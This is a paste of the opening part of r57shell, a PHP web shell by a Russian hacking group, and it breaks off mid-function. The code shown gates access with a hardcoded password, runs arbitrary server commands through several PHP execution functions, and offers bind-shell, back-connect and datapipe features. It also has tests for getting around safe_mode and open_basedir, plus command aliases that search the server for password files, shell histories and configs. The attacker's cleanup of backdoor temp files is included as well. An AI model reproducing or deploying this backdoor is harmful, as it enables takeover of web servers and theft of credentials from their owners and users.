· 6 years ago · Jul 15, 2019, 02:00 PM
1<?php
2/******************************************************************************************************/
3/*
4/* # # # #
5/* # # # #
6/* # # # #
7/* # ## #### ## #
8/* ## ## ###### ## ##
9/* ## ## ###### ## ##
10/* ## ## #### ## ##
11/* ### ############ ###
12/* ########################
13/* ##############
14/* ######## ########## #######
15/* ### ## ########## ## ###
16/* ### ## ########## ## ###
17/* ### # ########## # ###
18/* ### ## ######## ## ###
19/* ## # ###### # ##
20/* ## # #### # ##
21/* ## ##
22/*
23/*
24/*
25/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
26/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
27/* Âåðñèÿ: 1.22
28/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
29/* (c)oded by 1dt.w0lf
30/* RST/GHC http://rst.void.ru , http://ghc.ru
31/******************************************************************************************************/
32
33/* ~~~ Íàñòðîéêè ~~~ */
34error_reporting(0);
35set_magic_quotes_runtime(0);
36@set_time_limit(0);
37@ini_set('max_execution_time',0);
38@ini_set('output_buffering',0);
39$safe_mode = @ini_get('safe_mode');
40$version = "1.22";
41
42// $HTTP_POST_VARS --> $_POST
43if(version_compare(phpversion(), '4.1.0') == -1)
44 {
45 $_POST = &$HTTP_POST_VARS;
46 $_GET = &$HTTP_GET_VARS;
47 $_SERVER = &$HTTP_SERVER_VARS;
48 }
49
50/* magic_quotes */
51if (@get_magic_quotes_gpc())
52 {
53 foreach ($_POST as $k=>$v)
54 {
55 $_POST[$k]=stripslashes($v);
56 }
57 }
58
59/* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
60
61// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
62// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
63$name="r57"; // ëîãèí ïîëüçîâàòåëÿ
64$pass="r57"; // ïàðîëü ïîëüçîâàòåëÿ
65
66if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
67 {
68 header("WWW-Authenticate: Basic realm=\"r57shell\"");
69 header("HTTP/1.0 401 Unauthorized");
70 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
71 }
72$head = '<!-- Çäðàâñòâóé Âàñÿ -->
73<html>
74<head>
75<title>r57shell</title>
76<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
77
78<STYLE>
79tr {
80BORDER-RIGHT: #aaaaaa 1px solid;
81BORDER-TOP: #eeeeee 1px solid;
82BORDER-LEFT: #eeeeee 1px solid;
83BORDER-BOTTOM: #aaaaaa 1px solid;
84}
85td {
86BORDER-RIGHT: #aaaaaa 1px solid;
87BORDER-TOP: #eeeeee 1px solid;
88BORDER-LEFT: #eeeeee 1px solid;
89BORDER-BOTTOM: #aaaaaa 1px solid;
90}
91table {
92BORDER-RIGHT: #eeeeee 1px outset;
93BORDER-TOP: #eeeeee 1px outset;
94BORDER-LEFT: #eeeeee 1px outset;
95BORDER-BOTTOM: #eeeeee 1px outset;
96BACKGROUND-COLOR: #D4D0C8;
97}
98input {
99BORDER-RIGHT: #ffffff 1px solid;
100BORDER-TOP: #999999 1px solid;
101BORDER-LEFT: #999999 1px solid;
102BORDER-BOTTOM: #ffffff 1px solid;
103BACKGROUND-COLOR: #e4e0d8;
104font: 8pt Verdana;
105}
106select {
107BORDER-RIGHT: #ffffff 1px solid;
108BORDER-TOP: #999999 1px solid;
109BORDER-LEFT: #999999 1px solid;
110BORDER-BOTTOM: #ffffff 1px solid;
111BACKGROUND-COLOR: #e4e0d8;
112font: 8pt Verdana;
113}
114submit {
115BORDER-RIGHT: buttonhighlight 2px outset;
116BORDER-TOP: buttonhighlight 2px outset;
117BORDER-LEFT: buttonhighlight 2px outset;
118BORDER-BOTTOM: buttonhighlight 2px outset;
119BACKGROUND-COLOR: #e4e0d8;
120width: 30%;
121}
122textarea {
123BORDER-RIGHT: #ffffff 1px solid;
124BORDER-TOP: #999999 1px solid;
125BORDER-LEFT: #999999 1px solid;
126BORDER-BOTTOM: #ffffff 1px solid;
127BACKGROUND-COLOR: #e4e0d8;
128font: Fixedsys bold;
129}
130BODY {
131margin-top: 1px;
132margin-right: 1px;
133margin-bottom: 1px;
134margin-left: 1px;
135}
136A:link {COLOR:red; TEXT-DECORATION: none}
137A:visited { COLOR:red; TEXT-DECORATION: none}
138A:active {COLOR:red; TEXT-DECORATION: none}
139A:hover {color:blue;TEXT-DECORATION: none}
140</STYLE>';
141
142
143/* show phpinfo */
144if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
145/* delete script */
146if(isset($_GET['delete']))
147 {
148 @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
149 }
150/* delete tmp files */
151if(isset($_GET['tmp']))
152 {
153 @unlink("/tmp/bdpl");
154 @unlink("/tmp/back");
155 @unlink("/tmp/bd");
156 @unlink("/tmp/bd.c");
157 @unlink("/tmp/dp");
158 @unlink("/tmp/dpc");
159 @unlink("/tmp/dpc.c");
160 }
161/* show php.ini vars */
162if(isset($_GET['phpini']))
163{
164echo $head;
165function U_value($value)
166 {
167 if ($value == '') return '<i>no value</i>';
168 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
169 if ($value === null) return 'NULL';
170 if (@is_object($value)) $value = (array) $value;
171 if (@is_array($value))
172 {
173 @ob_start();
174 print_r($value);
175 $value = @ob_get_contents();
176 @ob_end_clean();
177 }
178 return U_wordwrap((string) $value);
179 }
180
181 function U_wordwrap($str)
182 {
183 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
184 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
185 }
186
187if (@function_exists('ini_get_all'))
188 {
189 $r = '';
190 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
191 foreach (@ini_get_all() as $key=>$value)
192 {
193 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
194 }
195 echo $r;
196 echo '</table>';
197 }
198echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
199die();
200}
201/* info about cpu */
202if(isset($_GET['cpu']))
203 {
204 echo $head;
205 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
206 $cpuf = @file("cpuinfo");
207 if($cpuf)
208 {
209 $c = @sizeof($cpuf);
210 for($i=0;$i<$c;$i++)
211 {
212 $info = @explode(":",$cpuf[$i]);
213 if($info[1]==""){ $info[1]="---"; }
214 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
215 }
216 echo $r;
217 }
218 else
219 {
220 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
221 }
222 echo '</table>';
223 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
224 die();
225 }
226/* info about mem */
227if(isset($_GET['mem']))
228 {
229 echo $head;
230 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
231 $memf = @file("meminfo");
232 if($memf)
233 {
234 $c = sizeof($memf);
235 for($i=0;$i<$c;$i++)
236 {
237 $info = explode(":",$memf[$i]);
238 if($info[1]==""){ $info[1]="---"; }
239 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
240 }
241 echo $r;
242 }
243 else
244 {
245 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
246 }
247 echo '</table>';
248 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
249 die();
250 }
251
252/*
253Âûáîð ÿçûêà
254$language='ru' - ðóññêèé
255$language='eng' - àíãëèéñêèé
256*/
257$language='ru';
258
259$lang=array(
260'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
261'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
262'ru_text3' =>'Âûïîëíèòü êîìàíäó',
263'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
264'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
265'ru_text6' =>'Ëîêàëüíûé ôàéë',
266'ru_text7' =>'Àëèàñû',
267'ru_text8' =>'Âûáåðèòå àëèàñ',
268'ru_butt1' =>'Âûïîëíèòü',
269'ru_butt2' =>'Çàãðóçèòü',
270'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
271'ru_text10'=>'Îòêðûòü ïîðò',
272'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
273'ru_butt3' =>'Îòêðûòü',
274'ru_text12'=>'back-connect',
275'ru_text13'=>'IP-àäðåñ',
276'ru_text14'=>'Ïîðò',
277'ru_butt4' =>'Âûïîëíèòü',
278'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
279'ru_text16'=>'Èñïîëüçîâàòü',
280'ru_text17'=>'Óäàëåííûé ôàéë',
281'ru_text18'=>'Ëîêàëüíûé ôàéë',
282'ru_text19'=>'Exploits',
283'ru_text20'=>'Èñïîëüçîâàòü',
284'ru_text21'=>'Íîâîå èìÿ',
285'ru_text22'=>'datapipe',
286'ru_text23'=>'Ëîêàëüíûé ïîðò',
287'ru_text24'=>'Óäàëåííûé õîñò',
288'ru_text25'=>'Óäàëåííûé ïîðò',
289'ru_text26'=>'Èñïîëüçîâàòü',
290'ru_butt5' =>'Çàïóñòèòü',
291'ru_text28'=>'Ðàáîòà â safe_mode',
292'ru_text29'=>'Äîñòóï çàïðåùåí',
293'ru_butt6' =>'Ñìåíèòü',
294'ru_text30'=>'Ïðîñìîòð ôàéëà',
295'ru_butt7' =>'Âûâåñòè',
296'ru_text31'=>'Ôàéë íå íàéäåí',
297'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
298'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
299'ru_butt8' =>'Ïðîâåðèòü',
300'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
301'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
302'ru_text36'=>' Áàçà',
303'ru_text37'=>'Ëîãèí',
304'ru_text38'=>'Ïàðîëü ',
305'ru_text39'=>'Òàáëèöà',
306'ru_text40'=>'Äàìï òàáëèöû mysql ñåðâåðà',
307'ru_butt9' =>'Äàìï',
308'ru_text41'=>'Ñîõðàíèòü äàìï â ôàéëå',
309'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
310'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
311'ru_butt10'=>'Ñîõðàíèòü',
312'ru_butt11'=>'Ðåäàêòèðîâàòü',
313'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
314'ru_text45'=>'Ôàéë ñîõðàíåí',
315'ru_text46'=>'Ïðîñìîòð phpinfo()',
316'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
317'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
318'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
319'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
320'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
321'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
322'ru_text53'=>'Èñêàòü â ïàïêå',
323'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
324'ru_butt12'=>'Íàéòè',
325'ru_text55'=>'Òîëüêî â ôàéëàõ',
326'ru_text56'=>'Íè÷åãî íå íàéäåíî',
327'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
328'ru_text58'=>'Èìÿ',
329'ru_text59'=>'Ôàéë',
330'ru_text60'=>'Äèðåêòîðèþ',
331'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
332'ru_text61'=>'Ôàéë ñîçäàí',
333'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
334'ru_text63'=>'Ôàéë óäàëåí',
335'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
336'ru_text65'=>'Ñîçäàòü',
337'ru_text66'=>'Óäàëèòü',
338'ru_text67'=>'Chown/Chgrp/Chmod',
339'ru_text68'=>'Êîìàíäà',
340'ru_text69'=>'Ïàðàìåòð1',
341'ru_text70'=>'Ïàðàìåòð2',
342'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
343'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
344'ru_text73'=>'Èñêàòü â ïàïêå',
345'ru_text74'=>'Èñêàòü â ôàéëàõ',
346'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
347'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
348/* --------------------------------------------------------------- */
349'eng_text1' =>'Executed command',
350'eng_text2' =>'Execute command on server',
351'eng_text3' =>' Run command',
352'eng_text4' =>'Work directory',
353'eng_text5' =>'Upload files on server',
354'eng_text6' =>'Local file',
355'eng_text7' =>'Aliases',
356'eng_text8' =>'Select alias',
357'eng_butt1' =>'Execute',
358'eng_butt2' =>'Upload',
359'eng_text9' =>'Bind port to /bin/bash',
360'eng_text10'=>'Port',
361'eng_text11'=>'Password for access',
362'eng_butt3' =>'Bind',
363'eng_text12'=>'back-connect',
364'eng_text13'=>'IP',
365'eng_text14'=>'Port',
366'eng_butt4' =>'Connect',
367'eng_text15'=>'Upload files from remote server',
368'eng_text16'=>' With',
369'eng_text17'=>' Remote file',
370'eng_text18'=>' Local file',
371'eng_text19'=>'Exploits',
372'eng_text20'=>' Use',
373'eng_text21'=>' New name',
374'eng_text22'=>'datapipe',
375'eng_text23'=>'Local port',
376'eng_text24'=>'Remote host',
377'eng_text25'=>'Remote port',
378'eng_text26'=>'Use',
379'eng_butt5' =>'Run',
380'eng_text28'=>'Work in safe_mode',
381'eng_text29'=>'ACCESS DENIED',
382'eng_butt6' =>'Change',
383'eng_text30'=>' Cat file',
384'eng_butt7' =>' Show ',
385'eng_text31'=>'File not found',
386'eng_text32'=>'Eval PHP code',
387'eng_text33'=>'Test bypass open_basedir with cURL functions',
388'eng_butt8' =>'Test',
389'eng_text34'=>'Test bypass safe_mode with include function',
390'eng_text35'=>'Test bypass safe_mode with load file in mysql',
391'eng_text36'=>'Database',
392'eng_text37'=>'Login',
393'eng_text38'=>'Password',
394'eng_text39'=>'Table',
395'eng_text40'=>'Dump table from mysql server',
396'eng_butt9' =>'Dump',
397'eng_text41'=>'Save dump in file',
398'eng_text42'=>'Edit files',
399'eng_text43'=>'File for edit',
400'eng_butt10'=>'Save',
401'eng_text44'=>'Can\'t edit file! Only read access!',
402'eng_text45'=>'File saved',
403'eng_text46'=>'Show phpinfo()',
404'eng_text47'=>'Show variables from php.ini',
405'eng_text48'=>'Delete temp files',
406'eng_butt11'=>'Edit file',
407'eng_text49'=>'Delete script from server',
408'eng_text50'=>'View cpu info',
409'eng_text51'=>'View memory info',
410'eng_text52'=>'Find text',
411'eng_text53'=>'In dirs',
412'eng_text54'=>'Find text in files',
413'eng_butt12'=>'Find',
414'eng_text55'=>'Only in files',
415'eng_text56'=>'Nothing :(',
416'eng_text57'=>'Create/Delete File/Dir',
417'eng_text58'=>'name',
418'eng_text59'=>'file',
419'eng_text60'=>'dir',
420'eng_butt13'=>'Create/Delete',
421'eng_text61'=>'File created',
422'eng_text62'=>'Dir created',
423'eng_text63'=>'File deleted',
424'eng_text64'=>'Dir deleted',
425'eng_text65'=>'Create',
426'eng_text66'=>'Delete',
427'eng_text67'=>'Chown/Chgrp/Chmod',
428'eng_text68'=>'Command',
429'eng_text69'=>'param1',
430'eng_text70'=>'param2',
431'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
432'eng_text72'=>'Text for find',
433'eng_text73'=>'Find in folder',
434'eng_text74'=>'Find in files',
435'eng_text75'=>'* you can use regexp',
436'eng_text76'=>'Search text in files via find',
437);
438
439/*
440Àëèàñû êîìàíä
441Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
442Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
443*/
444
445$aliases=array(
446/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
447'find suid files'=>'find / -type f -perm -04000 -ls',
448/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
449'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
450/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
451'find sgid files'=>'find / -type f -perm -02000 -ls',
452/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
453'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
454/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
455'find config.inc.php files'=>'find / -type f -name config.inc.php',
456/* ïîèñê â òåê äèðå config.inc.php */
457'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
458/* ïîèñê íà ñåðâåðå ôàéëîâ config* */
459'find config* files'=>'find / -type f -name "config*"',
460/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
461'find config* files in current dir'=>'find . -type f -name "config*"',
462/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
463'find all writable files'=>'find / -type f -perm -2 -ls',
464/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
465'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
466/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
467'find all writable directories'=>'find / -type d -perm -2 -ls',
468/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
469'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
470/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
471'find all writable directories and files'=>'find / -perm -2 -ls',
472/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
473'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
474/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
475'find all service.pwd files'=>'find / -type f -name service.pwd',
476/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
477'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
478/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
479'find all .htpasswd files'=>'find / -type f -name .htpasswd',
480/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
481'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
482/* ïîèñê âñåõ ôàéëîâ .bash_history */
483'find all .bash_history files'=>'find / -type f -name .bash_history',
484/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
485'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
486/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
487'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
488/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
489'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
490/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
491'list file attributes on a Linux second extended file system'=>'lsattr -va',
492/* ïðîñìîòð îòêðûòûõ ïîðòîâ */
493'show opened ports'=>'netstat -an | grep -i listen',
494'----------------------------------------------------------------------------------------------------'=>'ls -la'
495);
496
497/* html */
498$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
499$table_up2 = " ::</div></b></font></td></tr><tr><td>";
500$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
501$table_end1 = "</td></tr>";
502$arrow = " <font face=Wingdings color=gray>è</font>";
503$lb = "<font color=black>[</font>";
504$rb = "<font color=black>]</font>";
505$font = "<font face=Verdana size=-2>";
506
507/* change dir */
508if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
509$dir = @getcwd();
510
511/* get OS */
512$windows = 0;
513$unix = 0;
514if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
515if(empty($dir))
516 { // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèðåêòîðèþ
517 $os = getenv('OS');
518 if(empty($os)){ $os = php_uname(); } // ïðîáóåì ïîëó÷èòü ÷åðåç php_uname()
519 if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
520 else
521 {
522 if(@eregi("^win",$os)) { $windows = 1; }
523 else { $unix = 1; }
524 }
525 }
526
527
528/* search text in files */
529if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
530 {
531 echo $head;
532 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
533 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
534 $sr->SearchText(0,0);
535 $res = $sr->GetResultFiles();
536 $found = $sr->GetMatchesCount();
537 $titles = $sr->GetTitles();
538 $r = "";
539 if($found > 0)
540 {
541 $r .= "<TABLE width=100%>";
542 foreach($res as $file=>$v)
543 {
544 $r .= "<TR>";
545 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
546 $r .= ($windows)? str_replace("/","\\",$file) : $file;
547 $r .= "</b></font></ TD>";
548 $r .= "</TR>";
549 foreach($v as $a=>$b)
550 {
551 $r .= "<TR>";
552 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
553 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
554 $r .= "</TR>\n";
555 }
556 }
557 $r .= "</TABLE>";
558 echo $r;
559 }
560 else
561 {
562 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
563 }
564 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
565 die(); // show founded strings and die
566 }
567
568/* Ïðîâåðêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïðè âûêëþ÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëþ÷åí */
569/* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëþ÷åí íî cmd.exe ïåðåèìåíîâàí */
570/* ëèáî êîãäà â php.ini ïðîïèñàíû disable_functions */
571if($windows&&!$safe_mode)
572 {
573 $uname = ex("ver");
574 if(empty($uname)) { $safe_mode = 1; }
575 }
576else if($unix&&!$safe_mode)
577 {
578 $uname = ex("uname");
579 if(empty($uname)) { $safe_mode = 1; }
580 }
581
582/* get server info */
583$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
584if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
585
586/* FUNCTIONS */
587
588/* WriteSpace */
589/* tnx to virus for idea */
590function ws($i)
591{
592return @str_repeat(" ",$i);
593}
594
595function ex($cfe)
596{
597 if (!empty($cfe))
598 {
599 if(function_exists('exec'))
600 {
601 @exec($cfe,$res);
602 $res = join("\n",$res);
603 }
604 elseif(function_exists('shell_exec'))
605 {
606 $res = @shell_exec($cfe);
607 }
608 elseif(function_exists('system'))
609 {
610 @ob_start();
611 @system($cfe);
612 $res = @ob_get_contents();
613 @ob_end_clean();
614 }
615 elseif(function_exists('passthru'))
616 {
617 @ob_start();
618 @passthru($cfe);
619 $res = @ob_get_contents();
620 @ob_end_clean();
621 }
622 elseif(@is_resource($f = @popen($cfe,"r")))
623 {
624 $res = "";
625 while(!@feof($f)) { $res .= @fread($f,1024); }
626 @pclose($f);
627 }
628 }
629 if(!empty($res)) return $res; else return 0;
630}
631
632/* write error */
633function we($i)
634{
635if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
636else { $text = "[-] ERROR! Can't write in file "; }
637echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
638}
639
640/* read error */
641function re($i)
642{
643if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
644else { $text = "[-] ERROR! Can't read file "; }
645echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
646}
647
648/* create error */
649function ce($i)
650{
651if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
652else { $text = "Can't create "; }
653echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
654}
655
656/* permissions */
657function perms($mode)
658{
659if ($GLOBALS['windows']) return 0;
660if( $mode & 0x1000 ) $type='p';
661else if( $mode & 0x2000 ) $type='c';
662else if( $mode & 0x4000 ) $type='d';
663else if( $mode & 0x6000 ) $type='b';
664else if( $mode & 0x8000 ) $type='-';
665else if( $mode & 0xA000 ) $type='l';
666else if( $mode & 0xC000 ) $type='s';
667else $type='u';
668$owner["read"] = ($mode & 00400) ? 'r' : '-';
669$owner["write"] = ($mode & 00200) ? 'w' : '-';
670$owner["execute"] = ($mode & 00100) ? 'x' : '-';
671$group["read"] = ($mode & 00040) ? 'r' : '-';
672$group["write"] = ($mode & 00020) ? 'w' : '-';
673$group["execute"] = ($mode & 00010) ? 'x' : '-';
674$world["read"] = ($mode & 00004) ? 'r' : '-';
675$world["write"] = ($mode & 00002) ? 'w' : '-';
676$world["execute"] = ($mode & 00001) ? 'x' : '-';
677if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
678if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
679if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
680$s=sprintf("%1s", $type);
681$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
682$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
683$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
684return trim($s);
685}
686
687/* find path to */
688function which($pr)
689{
690if ($GLOBALS['windows']) { return 0; }
691$path = ex("which $pr");
